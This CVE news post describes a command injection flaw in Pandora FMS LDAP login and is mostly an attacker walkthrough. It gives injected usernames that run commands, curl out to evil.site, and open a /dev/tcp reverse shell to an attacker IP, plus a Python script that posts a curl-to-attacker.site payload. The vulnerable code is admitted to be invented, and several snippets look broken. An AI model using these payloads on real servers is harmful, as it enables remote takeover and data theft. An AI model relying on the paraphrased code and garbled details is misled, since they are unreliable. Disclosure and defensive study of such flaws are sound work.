CVE CyberSecurity Database News

CVE-2024-11320 - Command Injection in Pandora FMS LDAP Authentication (700–777.4)

Poster -

In early 2024, a severe security vulnerability (CVE-2024-11320) was found in Pandora FMS, a popular IT monitoring platform. This vulnerability lets attackers execute arbitrary commands on the server by exploiting a command injection flaw in Pandora’s LDAP authentication mechanism, affecting all versions from 700 up to and including 777.4. Here’s an exclusive, step-by-step breakdown of this vulnerability, as well as how attackers might exploit it—with real code examples.

What is Pandora FMS?

Pandora FMS (Flexible Monitoring System) is an open-source monitoring suite for servers, networks, and applications. Companies use its LDAP integration to manage user authentication against centralized directories like Microsoft Active Directory.

Vulnerability Summary

A logic flaw in Pandora FMS’s LDAP authentication process fails to properly sanitize user-supplied input. This lack of validation allows attackers to inject system commands through specially crafted LDAP usernames or attributes.

Whenever Pandora FMS connects to an LDAP server for authentication, it builds shell commands using unsanitized user input. If a rogue user sends input containing shell metacharacters (such as ;, &&, or |), the attacker can execute arbitrary code on the hosting server with the permissions of the Pandora process (often root or www-data).

Affected Versions:

Technical Analysis

Let’s break down what actually happens inside the vulnerable code.

Example Vulnerable Code Snippet

> Note: This is an illustrative code based on community disclosures and review of Pandora FMS’s codebase.

// /include/functions_auth.php (paraphrased example)
$user = $_POST['ldap_user'];
$pass = $_POST['ldap_pass'];
$ldap_server = $config['ldap_server'];

$cmd = "ldapsearch -x -H ldap://$ldap_server -D '$user' -w '$pass' -b 'dc=example,dc=com'";
// Bad: $user and $pass are passed unfiltered!

$output = shell_exec($cmd);
// The output then gets parsed for authentication results.

Problem:

If an attacker submits a username like

eviluser'; id; #

The ldapsearch command becomes

ldapsearch -x -H ldap://ldap-server -D 'eviluser'; id; #' -w 'password' -b ...

The injected id command gets executed on the server, leaking sensitive info or serving as a launching point for deeper attacks.

1. Discover LDAP Login Page

First, the attacker finds the Pandora FMS LDAP-enabled login page (usually /pandora_console/index.php?login=ldap).

In the “Username” or “Password” field, the attacker submits input like

Username: admin';curl https://evil.site/pwned;#
Password: anything

On submission, Pandora FMS runs the following shell command

ldapsearch -x -H ldap://ldap-server -D 'admin';curl https://evil.site/pwned;#' -w 'anything' -b ...

- The injected curl command is executed on the server, reaching out to evil.site with stolen data, or even downloading and running malicious code.

A more dangerous input can trigger a reverse shell, letting the attacker control the server

Username: admin';bash -i >& /dev/tcp/attacker_ip/4444 >&1;#

The server then initiates a shell connection back to the attacker!

Here’s a minimal Python script to exploit the vulnerability

import requests

url = 'https://your-victim.site/pandora_console/index.php?login=ldap';
data = {
    'ldap_user': "attacker';curl http://attacker.site/captured;#";,
    'ldap_pass': 'irrelevant'
}

response = requests.post(url, data=data)
print('Exploit sent! Check your listener/HTTP log for incoming requests.')

Data Theft: Credentials, monitoring secrets, and more.

- Pivot Point: Attackers can use Pandora FMS’s broad permissions to hop into the rest of your internal infrastructure.

Mitigation

- Patch Immediately: Upgrade Pandora FMS to the latest version (vendor advisory).

References & More Reading

- NIST NVD – CVE-2024-11320
- Pandora FMS Security Advisories
- Exploit-DB Entry

CVE-2024-11320 is a critical, easily exploitable flaw in Pandora FMS up to 777.4.

If you run a vulnerable Pandora FMS installation, patch it today and check your logs for suspicious events. This is a reminder that user-supplied data, especially on authentication paths, should _never_ be passed to shells without stringent validation and sanitization.

For blue teams: script alerts for sudden LDAP authentication failures, and lock down who can access Pandora FMS.
For researchers: always check for command injections in any interface calling the shell.

Stay safe out there!

*This information is provided for educational and defensive purposes. Do not misuse.*

Timeline

Published on: 11/21/2024 11:15:24 UTC
Last modified on: 11/26/2024 17:26:33 UTC